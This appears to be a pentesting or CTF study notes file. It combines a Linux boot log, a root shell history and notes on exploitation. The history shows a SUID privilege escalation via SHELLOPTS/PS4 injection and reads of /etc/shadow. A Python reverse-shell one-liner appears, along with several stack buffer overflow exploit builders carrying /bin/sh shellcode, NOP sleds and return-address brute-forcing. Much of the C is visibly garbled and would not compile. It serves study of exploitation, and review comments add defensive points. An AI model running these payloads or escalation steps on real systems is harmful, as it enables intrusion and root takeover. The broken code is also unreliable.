1383Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1384Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1385Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1386Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1387Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1388Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1389Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1390Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1391Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1392Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1393Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1394Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1395Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1396Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1397Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1398Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1399Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1400Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1401Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1402Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1403Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1404Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1405Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1406Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1407Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1408Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1409Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1410Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1411Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1412Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1413Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1414Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1415Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1416Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1417Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1418Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1419Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1420Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1421Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1422Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1423Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1424Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1425Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1426Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1427Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1428Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1429Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1430Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1431Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1432Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1433Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1434rootbash-4.1# history | tail -100
1435 115 ls
1436 116 cat /etc/hosts.allow
1437 117 arp -A
1438 118 arp
1439 119 arp -vpn
1440 120 arp -vn
1441 121 netstat -A
1442 122 netstat -r
1443 123 netstat -i
1444 124 netstat -g
1445 125 netstat -e
1446 126 netstat -l
1447 127 netstat
1448 128 man netstat
1449 129 netstat -tcp
1450 130 netstat -udp
1451 131 netstat -p tcp
1452 132 netstat -p udp
1453 133 netstat -p tcp 22
1454 134 netstat -p 22
1455 135 netstat -p 80
1456 136 netstat -p tcp
1457 137 netstat -p udp
1458 138 ls
1459 139 clear
1460 140 dmesg | grep /var/log
1461 141 dmesg | grep /var/log/messages.log
1462 142 cd /var/log
1463 143 ls
1464 144 dmesg | grep /var/log/syslog | less
1465 145 dmesg | grep /var/log/syslog | more
1466 146 dmesg | grep /var/log/syslog
1467 147 ls -la /var/log/syslog
1468 148 chmod 755 /var/log/syslog
1469 149 ls -la /var/log/syslog
1470 150 ls
1471 151 tail -f /var/log/syslog
1472 152 tail -f /var/log/syslog | more
1473 153 dmesg | grep /var/log/syslog > w0rd.txt
1474 154 cat w0rd.txt
1475 155 ls
1476 156 chmod 755 w0rd.txt
1477 157 ls
1478 158 cat w0rd.txt
1479 159 ls -la w0rd.txt
1480 160 rm -f w0rd.txt
1481 161 ls
1482 162 cat /var/log/syslog
1483 163 cat /var/log/syslog | less foo.txt
1484 164 cat /var/log/syslog | grep /usr/local/bin
1485 165 cat /var/log/syslog | grep /tmp
1486 166 cat /var/log/syslog | grep /rootbash
1487 167 ls
1488 168 cat /var/log/syslog
1489 169 ls
1490 170 dmesg /var/log/auth.log.2.gz
1491 171 cat /var/log/wtmp
1492 172 cat /var/run/utmp
1493 173 who am i
1494 174 users
1495 175 last
1496 176 finger
1497 177 cat /var/log/secure
1498 178 cat /var/log/auth.log
1499 179 head -5 /var/log/auth.log
1500 180 fc -l -10
1501 181 nano .bash_history
1502 182 history 100
1503 183 ls -la
1504 184 who am i
1505 185 cd /
1506 186 ls
1507 187 cd /home
1508 188 ls
1509 189 cd user/
1510 190 ls
1511 191 cd ..
1512 192 ls
1513 193 cat /etc/passwd
1514 194 cat /etc/shadow
1515 195 exit
1516 196 /usr/local/bin/suid-env2
1517 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1518 198 /tmp/rootbash -p
1519 199 exit
1520 200 cls
1521 201 exit
1522 202 ls
1523 203 cd tools
1524 204 ls
1525 205 /tmp/rootbash -p
1526 206 exit
1527 207 su newroot
1528 208 whoami
1529 209 cat /etc/passwd
1530 210 su root
1531 211 exit
1532 212 tail -f /var/log/messages
1533 213 cat /var/log/messages
1534 214 history | tail -100
1535rootbash-4.1# id
1536uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1537rootbash-4.1# whoami
1538root
1539rootbash-4.1# ls -la /home/user/bmillakid
1540rootbash-4.1# cd /home
1541rootbash-4.1# ls
1542user
1543rootbash-4.1# cd user
1544rootbash-4.1# ls
1545l33t.txt myvpn.ovpn tools
1546rootbash-4.1#
1563
15641. Checking if the parameter "commandString" is set
1565
15662. If it is, then the variable $command_string gets what was passed into the input field
1567
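15683. The program then enters a try block and calls passthru($command_string). You can read the docs on passthru() on PHP's website, but in general it executes whatever was entered into the input field and passes the output directly back to the browser. Because the request value reaches passthru() without any validation or escaping, this is an OS command injection sink; the usual fix is to not hand request data to a shell at all, or to accept only an allow-list of commands and quote any argument with escapeshellarg().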
1569
15704. If the try does not succeed, the error is output to the page. Generally this won't print anything, because stderr is not output, but PHP doesn't let you have a try without a catch.
1571
1572
1573
1574reverse shell
1575http://10.10.202.91:8888/
1576/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1577ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1578
1579
1580
1581
1582?noot=1 -1
1583
1584
1585ThereIsMoreToXSSThanYouThink
1586
1587ReflectiveXss4TheWin
1588
1589----BEGIN PGP PUBLIC KEY BLOCK-----
1590Comment: https://keybase.io/download
1591Version: Keybase Go 5.6.0 (windows)
1592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1640=QLLF
1641-----END PGP PUBLIC KEY BLOCK-----
1642
1643#include <stdlib.h>
1644
// Size/offset defaults for the payload builder in main() below.
// NOTE(review): this listing is a transcription and does not compile as pasted.
1645#define offset_size 0
1646#define buffer-size 600
1647
// Three 4-byte words that the author labels as the addresses of system(),
// exit() and a "/bin/sh" string -- what looks like a return-into-libc style
// chain rather than injected machine code. The values are hard-coded, so they
// only mean anything for one specific process image with fixed library load
// addresses; address-space layout randomisation invalidates them on every run.
1648char sc[] =
1649"\xc0\xf2\x03\x42" //system()
1650"\x02\x9b\xb0\x42" //exit()
1651"\xa0\x8a\xb2\x42" //binsh
1652
// Helper used by main() as the base of its address guess. Its only statement
// is an inline-asm instruction naming %esp and %eax, so it is apparently meant
// to hand back the current stack pointer; there is no return statement, and
// the value is presumably expected to be left in %eax.
// NOTE(review): such an estimate is only useful while stack addresses repeat
// from run to run; with stack randomisation enabled it does not carry over to
// another process.
1653unsigned llong find_start(void) {
1654
1655 __asm__("mov1 %esp,%eax");
1656}
1657
// Builds an environment string "BUF=..." and starts /bin/bash with it set.
//
// argv[1] (optional) overrides the buffer size, argv[2] (optional) overrides
// the offset subtracted from find_start(); both go through atoi() with no
// range check.
//
// The buffer is first filled with copies of the guessed address, the bytes of
// sc[] are copied in starting four bytes from the front, and the first four
// bytes are then stamped with "BUF=". Presumably the shell is used to launch a
// target that copies $BUF into a fixed-size stack buffer -- TODO confirm, the
// target is not part of this listing.
//
// NOTE(review): buff is never assigned before `ptr = buff`, so every write in
// this function goes through an uninitialised pointer.
// Defensive takeaways: the approach depends on a predictable stack address and
// on an unbounded copy of environment data in the target; stack randomisation,
// stack protectors and length-checked handling of getenv() results in
// privileged programs each remove a precondition.
1658int main(int argc, char *argv[])
1659{
1660
1661 char *buff, *ptr;
1662 long *addr_ptr, addr;
1663 int offset=offset_size, bsize=buffer_size;
1664 int i;
1665
1666 if (argc > 1) bsize = atoi(argv[1]);
1667 if (argc > 2) offset = atoi(argv[2]);
1668
1669 addr = find_start() -offset;
1670 ptr = buff;
1671 addr_ptr= (long *) ptr;
// Fill the whole buffer with the guessed address, one long at a time.
1672 for (i = 0; i < bsize; i+=4)
1673 *(addr_ptr++) =addr;
1674
1675 ptr +=4;
1676
// Copy sc[] in after the first four bytes; strlen() stops at the first NUL.
1677 for (i = 0; i < strlen(sc); i++)
1678 *(ptr++) =sc[i];
1679
1680buff[bsize -1] = '\0';
1681
// Turn the buffer into a NAME=value string and export it; putenv() keeps the
// pointer rather than copying it.
1682memcpy(buff,"BUF=",4);
1683putenv(buff);
1684system("/bin/bash");
1685
1686}
1687
1688
1689specific syscall number is loaded into eax
1690arguments to the syscall function are placed into other registers
1691instruction int 0x80 is executed
1692CPU switches to kernel mode
1693syscall function is executed
1694
1695//shell.c
// Replaces the current process image with /bin/sh: argv is {"/bin/sh", NULL}
// and the environment pointer is null. exit(0) is only reached if execve()
// returns, i.e. if it failed.
// Presumably the C reference for the byte string in shellcode.c below.
// From a monitoring point of view, an execve of a shell by a process that
// normally never spawns one is a useful audit signal.
1696int main() {
1697 char *name[2];
1698
1699 name[0] = "/bin/sh";
1700 name[1] = 0x0;
1701 execve(name[0], name, 0x0);
1702 exit (0);
1703 }
1704
1705
1706//shellcode.c
// Byte string that the notes treat as machine code. The final seven bytes
// (2f 62 69 6e 2f 73 68) are ASCII "/bin/sh", and cd 80 is the int 0x80
// instruction described in the syscall notes above; both are stable static
// signatures for this family of payloads.
// NOTE(review): the typographic quotes come from the paste and are not valid
// C string delimiters.
1707char shellcode[] =
1708“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1709
// Test harness for the shellcode[] array: it takes the address of a local
// named ret, steps two ints up from it and stores the address of shellcode[]
// there. Going by the note that follows, the slot written is meant to be the
// saved return address, so that returning from main() continues in the array.
// NOTE(review): the declaration of ret is missing from this transcription.
// The array lives in a data section, so this only runs where data pages are
// executable; with non-executable data (NX/DEP) the transfer faults instead.
1710int main()
1711{
1712
1713 int = (int *)&ret +2;
1714 (*ret) = (int)shellcode;
1715
1716}
1717
1718[ask application to force input, causing the address we supplied to be loaded into EIP
1719,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1720
1721when RET is popped off the stack and loaded into EIP the first instruction is executed of the shellcode
1722
1723
1724Location pointer
1725
1726// find_start.c
// Apparently meant to return the current stack pointer: the only statement is
// an inline-asm instruction naming %esp and %eax, and there is no return
// statement, so the value is presumably expected to be left in %eax.
1727unsigned long find_start(void)
1728{
1729
1730 __asm__("move1 %esp, %eax");
1731
1732}
1733
// Prints the value returned by find_start().
// NOTE(review): %n is not an output conversion -- it makes printf store a
// character count through a pointer argument -- so passing an integer here is
// undefined behaviour; a hexadecimal conversion was presumably intended.
// Running a program like this several times is a quick check of whether stack
// randomisation is active: with it enabled the printed value changes per run.
1734int main()
1735{
1736
1737 printf("0x%n\n",find_start());
1738}
1739
1740[putting programs into arrays with no bounds checking ]
1741 [has to be owned by root in suid]
1742
1743sudo chown root victim
1744sudo chmod +s victim
1745
1746./victim <shellcode>padding>choice-of-returnaddress
1747
1748./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1749
1750./victim $(printf "%0512x" 0)
1751./victim $(printf %0516x" 0)
1752./victim $(printf %0520x" 0)
1753./victim $(printf %0524x" 0)
1754Segfault
1755./victim $(printf %0528x" 0)
1756Segfault
1757[we can tell the saved return address is probably 524-528 bytes
1758shellcode = [40]
1759padding = [480]
1760saved ret address [0xbffffad8]
1761
1762./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1763[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1764
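1765[little endian: the least significant byte of the address is stored first, so 0xbffffad8 appears as \xd8\xfa\xff\xbf]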
1766
1767./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1768Illegal instruction
1769
17708%0484x\x38\xfa\xff\xbf")
1771
1772[program to guess offset between start of the program and first instruction for shellcode]
1773
1774#include <stdlib.h>
1775
// Defaults read by main() below: offset_size is subtracted from the stack
// pointer estimate, buffer_size is the length of the environment string.
1776#define offset_size 0
1777#define buffer_size 512
1778
1779
// Payload bytes copied into the buffer by main(). The final seven bytes
// (2f 62 69 6e 2f 73 68) are ASCII "/bin/sh".
// NOTE(review): the declaration is duplicated and uses typographic quotes in
// this paste, so the line is not valid C as written.
1780char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1781
// Base for main()'s address guess. The single inline-asm statement names %esp
// and %eax, so the function is apparently meant to hand back the current
// stack pointer; nothing is returned explicitly.
// NOTE(review): the guess only transfers to another process when stack
// addresses are not randomised.
1782unsigned long find_start(void) {
1783
1784 __asm__(*mov1 %esp,%eax");
1785
1786}
1787
// Same builder as the earlier listing, with the guessed address printed
// before the buffer is filled: the result is an environment string "BUF=..."
// made of repeated copies of the guess plus the bytes of sc[], exported with
// putenv() before a shell is started.
//
// argv[1] (optional) overrides the buffer size and argv[2] (optional) the
// offset; both are parsed with atoi() and not range-checked.
//
// NOTE(review): buff is never assigned before `ptr = buff`, so all writes go
// through an uninitialised pointer. The printf() uses %n, which stores through
// a pointer argument instead of printing; passing addr there is undefined
// behaviour.
// Defensive takeaways: repeated-guess approaches like this assume the stack
// address is stable across runs and that the target copies environment data
// without a bound; stack randomisation, stack protectors, non-executable
// stacks and bounded copies each remove one of those assumptions.
1788int main(int argc, char *argv[])
1789{
1790
1791 char *buff, *ptr;
1792 long *addr_ptr, addr;
1793 int offset=offset_size, bsize=buffer_size;
1794 int i;
1795
1796 if (argc > 1) bsize = atoi(argv[1]);
1797 if (argc > 2) offset = atoi(argv[2]);
1798
1799 addr = find_start() - offset;
1800 printf("attempt address: 0x%n\n",addr);
1801
1802 ptr = buff;
1803 addr_ptr =(long *) ptr;
// Fill the buffer with the guessed address, one long at a time.
1804 for (i - 0; i < bsize; i+=4)
1805 * (addr_ptr++) = addr;
1806
1807 ptr +=4;
1808
// Copy sc[] in after the first four bytes; strlen() stops at the first NUL.
1809 for (i = 0; i < strlen(sc); i++)
1810 *(ptr++) = sc[i];
1811
1812 buff[bsize - 1] = '\0';
1813
// Stamp the variable name over the first four bytes and export the string;
// putenv() keeps the pointer rather than copying it.
1814 memcpy(buff, "BUF=",4);
1815 putenv(buff);
1816 system(" /bin/bash");
1817
1818}
1819
1820
1821[NOP]
1822
1823
1824
1825#include <stdlib.h>
1826
// Defaults for main() below: the offset subtracted from get_sp(), the length
// of the environment string, and the filler byte (0x90, the x86 NOP opcode).
1827#define DEFAULT_OFFSET 0
1828#define DEFAULT_BUFFER_SIZE 512
1829#define NOP 0x90
1830
1831
// Payload bytes placed in the middle of the buffer by main(). The final seven
// bytes (2f 62 69 6e 2f 73 68) are ASCII "/bin/sh".
// NOTE(review): the declaration is duplicated, wrapped mid-string and uses
// typographic quotes in this paste, so it is not valid C as written.
1832 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1833\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1834
// Apparently meant to return the current stack pointer: the only statement is
// an inline-asm instruction naming %esp and %eax, with no explicit return.
// main() subtracts its offset from the result to form the address it writes
// into the buffer.
1835unsigned long get_sp(void) {
1836 __asm__("mov1 %esp,%eax");
1837}
1838
// NOP-padded variant of the builder (the body is collapsed onto one line in
// this paste).
//
// argv[1] (optional) overrides the buffer size, argv[2] (optional) the offset
// subtracted from get_sp(); both go through atoi() unchecked. Unlike the
// earlier listings, the buffer is allocated with malloc() and the allocation
// is checked. The statements then, in order: fill the buffer with copies of
// the guessed address, overwrite the first half with NOP bytes, copy
// shellcode[] so that it is centred on bsize/2, NUL-terminate, stamp "BUF="
// over the first four bytes, export the string with putenv() and start
// /bin/bash.
//
// NOTE(review): a zero or negative bsize from argv[1] makes buff[bsize - 1]
// an out-of-bounds write; main is declared void rather than int.
// Defensive takeaways: long runs of 0x90 in environment variables or arguments
// handed to privileged programs are a long-standing detection signature, and
// the padding only widens the window for a guessed address -- it does not
// help where the stack is non-executable or the target bounds its copy.
1839void main(int argc, char *argv[])
1840
1841{
1842
1843 char *buff, *ptr;
1844
1845 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1846
1847
1848